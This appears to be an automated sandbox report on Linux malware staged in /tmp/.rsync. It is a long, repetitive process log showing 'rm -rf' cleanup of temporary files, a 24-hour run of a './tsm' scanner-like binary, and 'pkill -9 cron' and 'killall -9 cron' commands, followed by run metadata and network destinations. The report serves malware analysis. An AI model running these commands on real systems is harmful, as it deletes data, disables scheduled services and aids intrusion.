/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

Network

N/A

Files

N/A

Analysis: behavioral19

Detonation Overview

Submitted

2024-06-28 12:54

Reported

2024-06-28 12:57

Platform

ubuntu1804-amd64-20240611-en

Max time kernel

0s

Max time network

129s

Command Line

[/tmp/.rsync/c/golan]

Signatures

N/A

Processes

/tmp/.rsync/c/golan

[/tmp/.rsync/c/golan]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
GB 185.125.188.62:443 tcp
GB 185.125.188.62:443 tcp
US 151.101.1.91:443 tcp
US 1.1.1.1:53 ocp-ingress.fastly.gnome.org udp
US 151.101.1.91:443 ocp-ingress.fastly.gnome.org tcp
GB 89.187.167.5:443 tcp

Files

N/A

Analysis: behavioral13

Detonation Overview

Submitted

2024-06-28 12:54

Reported

2024-06-28 12:57

Platform

debian9-mipsbe-20240418-en

Max time kernel

2s

Command Line

[/tmp/.rsync/a/stop]

Signatures

Enumerates running processes

Reads CPU attributes

Description Indicator Process Target
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /bin/ps N/A

Reads runtime system information

Description Indicator Process Target
File opened for reading /proc/18/cmdline /usr/bin/pkill N/A
File opened for reading /proc/695/status /usr/bin/pkill N/A
File opened for reading /proc/13/stat /bin/ps N/A
File opened for reading /proc/22/cmdline /bin/ps N/A
File opened for reading /proc/37/status /bin/ps N/A
File opened for reading /proc/69/stat /bin/ps N/A
File opened for reading /proc/240/cmdline /bin/ps N/A
File opened for reading /proc/362/stat /bin/ps N/A
File opened for reading /proc/12/cmdline /usr/bin/pkill N/A
File opened for reading /proc/159/cmdline /bin/ps N/A
File opened for reading /proc/14/status /usr/bin/pkill N/A
File opened for reading /proc/70/cmdline /usr/bin/pkill N/A
File opened for reading /proc/404/cmdline /usr/bin/pkill N/A
File opened for reading /proc/20/stat /usr/bin/killall N/A
File opened for reading /proc/159/stat /usr/bin/killall N/A
File opened for reading /proc/240/stat /usr/bin/killall N/A
File opened for reading /proc/668/stat /usr/bin/killall N/A
File opened for reading /proc/694/cmdline /usr/bin/killall N/A
File opened for reading /proc/362/stat /usr/bin/killall N/A
File opened for reading /proc/74/stat /bin/ps N/A
File opened for reading /proc/700/cmdline /bin/ps N/A
File opened for reading /proc/159/status /usr/bin/pkill N/A
File opened for reading /proc/68/stat /usr/bin/killall N/A
File opened for reading /proc/filesystems /bin/ps N/A
File opened for reading /proc/722/cmdline /bin/ps N/A
File opened for reading /proc/733/status /bin/ps N/A
File opened for reading /proc/3/stat /bin/ps N/A
File opened for reading /proc/21/status /bin/ps N/A
File opened for reading /proc/20/status /usr/bin/pkill N/A
File opened for reading /proc/240/status /usr/bin/pkill N/A
File opened for reading /proc/668/status /usr/bin/pkill N/A
File opened for reading /proc/721/cmdline /usr/bin/pkill N/A
File opened for reading /proc/724/status /bin/ps N/A
File opened for reading /proc/15/stat /usr/bin/killall N/A
File opened for reading /proc/19/cmdline /bin/ps N/A
File opened for reading /proc/20/stat /bin/ps N/A
File opened for reading /proc/69/status /bin/ps N/A
File opened for reading /proc/718/status /bin/ps N/A
File opened for reading /proc/1/status /usr/bin/pkill N/A
File opened for reading /proc/21/cmdline /usr/bin/pkill N/A
File opened for reading /proc/4/stat /usr/bin/killall N/A
File opened for reading /proc/681/status /bin/ps N/A
File opened for reading /proc/726/cmdline /bin/ps N/A
File opened for reading /proc/166/cmdline /usr/bin/pkill N/A
File opened for reading /proc/336/status /usr/bin/pkill N/A
File opened for reading /proc/336/cmdline /usr/bin/pkill N/A
File opened for reading /proc/17/stat /usr/bin/killall N/A
File opened for reading /proc/695/cmdline /usr/bin/killall N/A
File opened for reading /proc/12/stat /bin/ps N/A
File opened for reading /proc/17/status /usr/bin/pkill N/A
File opened for reading /proc/19/stat /usr/bin/killall N/A
File opened for reading /proc/694/status /usr/bin/pkill N/A
File opened for reading /proc/722/stat /usr/bin/killall N/A
File opened for reading /proc/20/cmdline /bin/ps N/A
File opened for reading /proc/733/cmdline /bin/ps N/A
File opened for reading /proc/9/cmdline /bin/ps N/A
File opened for reading /proc/37/cmdline /bin/ps N/A
File opened for reading /proc/394/cmdline /bin/ps N/A
File opened for reading /proc/668/cmdline /bin/ps N/A
File opened for reading /proc/180/cmdline /usr/bin/pkill N/A
File opened for reading /proc/8/stat /usr/bin/killall N/A
File opened for reading /proc/718/cmdline /usr/bin/pkill N/A
File opened for reading /proc/74/stat /usr/bin/killall N/A
File opened for reading /proc/735/cmdline /bin/ps N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/.rsync/a/.proc /tmp/.rsync/a/stop N/A

Processes

/tmp/.rsync/a/stop

[/tmp/.rsync/a/stop]

/usr/bin/pkill

[pkill -9 cron]

/usr/bin/killall

[killall -9 cron]

/bin/ps

[ps x]

/bin/grep

[grep -v grep]

/bin/grep

[grep cron]

/usr/bin/awk

[awk {print $1}]

/bin/rm

[rm -rf .proc]

Network

N/A

Files

N/A

Analysis: behavioral15

Detonation Overview

Submitted

2024-06-28 12:54

Reported

2024-06-28 12:58

Platform

ubuntu1804-amd64-20240611-en

Max time kernel

147s

Max time network

129s

Command Line

[/tmp/.rsync/c/go]

Signatures

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A
